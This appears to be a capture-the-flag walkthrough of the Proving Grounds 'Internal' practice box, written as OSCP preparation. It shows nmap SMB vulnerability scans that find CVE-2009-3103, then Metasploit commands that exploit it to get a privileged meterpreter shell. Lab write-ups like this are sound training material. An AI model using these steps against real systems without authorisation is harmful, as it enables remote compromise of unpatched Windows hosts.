Internal — proving grounds OSCP prep(practice, easy)

This is a walkthrough for Offensive Security’s internal box on their paid subscription service, Proving Grounds.

First things first

connect to the vpn

sudo openvpn ~/Downloads/pg.ovpn

*start up target machine on proving grounds site*

set target ip to a local variable

target=”192.168.105.40"

Enumeration

Initial nmap scan

nmap $target -sV -sC -oN nmap_1

Next, we further enumerate SMB

nmap — script smb-vuln* -p 139,445 -oN smb-vuln-scan $target

Host script results:

| smb-vuln-cve2009–3103:

| VULNERABLE:

| SMBv2 exploit (CVE-2009–3103, Microsoft Security Advisory 975497)

As you can see from our NSE scripts output, there is a vulnerability we can make use of. Next, we will try to find an exploit written for this vulnerability: CVE-2009–3103

Exploitation

After several attempts at trying to use the non-metasploit exploits, I gave up and used metasploit. There were other exploits that offered RCE as well but they were poorly written and not EDB verified. The official Proving grounds write up for this box uses a metasploit exploit as well, so i suspect the talented folks over at Offensive Security had similar issues ;)

msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target-ip>
set LHOST <local-ip>
run

Now, you should have a meterpreter shell.

Post-Exploitation

you should have full privileges now. You will find the flag on the administrators desktop: proof.txt

Happy hacking, good luck on your OSCP journey. if you want to see mine, checkout my Noob to OSCP vlog. If you found this guide useful please throw me some claps or a follow because it makes me happy :)